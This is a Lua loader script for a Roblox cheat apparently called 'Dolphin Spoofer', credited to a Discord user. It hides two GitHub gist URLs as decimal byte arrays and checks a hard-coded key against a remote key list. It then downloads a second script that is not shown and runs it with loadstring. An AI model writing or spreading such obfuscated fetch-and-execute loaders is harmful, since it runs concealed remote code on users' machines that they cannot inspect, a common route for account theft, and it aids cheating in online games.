-- ________________________________________________________________________
-- |   Dolphin Private | Temporarily Free For Testing :D                   |
-- |   fully developed by: @dolphinbackup on discord                       |
-- |   Toggle: RightShift                                                  |
-- |_______________________________________________________________________|

local KEY = "PRIVATE-OWR-HCJ-4NVT"

local urlBytes = {
    104, 116, 116, 112, 115, 58, 47, 47, 103, 105, 115, 116, 46, 103, 105,
    116, 104, 117, 98, 117, 115, 101, 114, 99, 111, 110, 116, 101, 110, 116,
    46, 99, 111, 109, 47, 100, 111, 108, 112, 104, 105, 110, 50, 51, 49,
    47, 51, 102, 49, 53, 100, 49, 54, 56, 48, 102, 100, 48, 50, 51,
    101, 101, 101, 97, 53, 51, 52, 48, 99, 100, 99, 101, 101, 98, 102,
    53, 57, 53, 47, 114, 97, 119, 47, 99, 52, 54, 53, 52, 50, 54,
    57, 57, 102, 57, 102, 101, 102, 102, 56, 98, 55, 52, 102, 51, 52,
    97, 54, 50, 101, 101, 98, 53, 102, 49, 50, 100, 101, 57, 97, 57,
    97, 48, 102, 47, 107, 101, 121, 115, 46, 116, 120, 116
}

local gistBytes = {
    104, 116, 116, 112, 115, 58, 47, 47, 103, 105, 115, 116, 46, 103, 105,
    116, 104, 117, 98, 117, 115, 101, 114, 99, 111, 110, 116, 101, 110, 116,
    46, 99, 111, 109, 47, 100, 111, 108, 112, 104, 105, 110, 50, 51, 49,
    47, 54, 54, 53, 57, 99, 98, 50, 101, 48, 98, 53, 98, 50, 101,
    101, 99, 102, 53, 48, 50, 50, 100, 54, 54, 101, 53, 49, 54, 52,
    97, 53, 53, 47, 114, 97, 119, 47, 100, 49, 52, 101, 97, 54, 97,
    55, 57, 55, 50, 52, 50, 53, 48, 49, 57, 98, 102, 97, 49, 57,
    55, 55, 55, 99, 97, 49, 49, 54, 97, 100, 48, 100, 49, 55, 52,
    99, 55, 50, 47, 103, 105, 115, 116, 102, 105, 108, 101, 49, 46, 116,
    120, 116
}

local KEYS_URL = ""
for _, b in ipairs(urlBytes) do KEYS_URL = KEYS_URL .. string.char(b) end

local MAIN_URL = ""
for _, b in ipairs(gistBytes) do MAIN_URL = MAIN_URL .. string.char(b) end

if KEY == "put_your_key_here" or KEY == "" then
    warn("[KEY SYSTEM] No key entered! Blocked.")
    return
end
if not KEY:match("^PRIVATE%-") then
    warn("[KEY SYSTEM] PRIVATE key required!")
    return
end

local success, result = pcall(function()
    return game:HttpGet(KEYS_URL .. "?nocache=" .. tostring(tick()))
end)

if not success or not result then
    warn("[KEY SYSTEM] Could not reach key server!")
    return
end

local found = false
for line in result:gmatch("[^\r\n]+") do
    if line:gsub("%s+", "") == KEY:gsub("%s+", "") then
        found = true
        break
    end
end

if not found then
    warn("[KEY SYSTEM] Invalid or expired key!")
    return
end

print("[KEY SYSTEM] Key verified ✓ Loading protected script...")

_G.DolphinSpooferVerified = true

-- Reliable loading
local success, code = pcall(function()
    return game:HttpGet(MAIN_URL .. "?nocache=" .. tostring(tick()))
end)

if not success then
    error("[LOAD ERROR] HttpGet failed: " .. tostring(code))
end

if not code or #code < 1000 then
    error("[LOAD ERROR] Downloaded script too small (blocked?) Length: " .. (#code or 0))
end

print("Successfully downloaded", #code, "bytes - Loading...")

loadstring(code, "@DolphinSpoofer")("private-verified-2026")
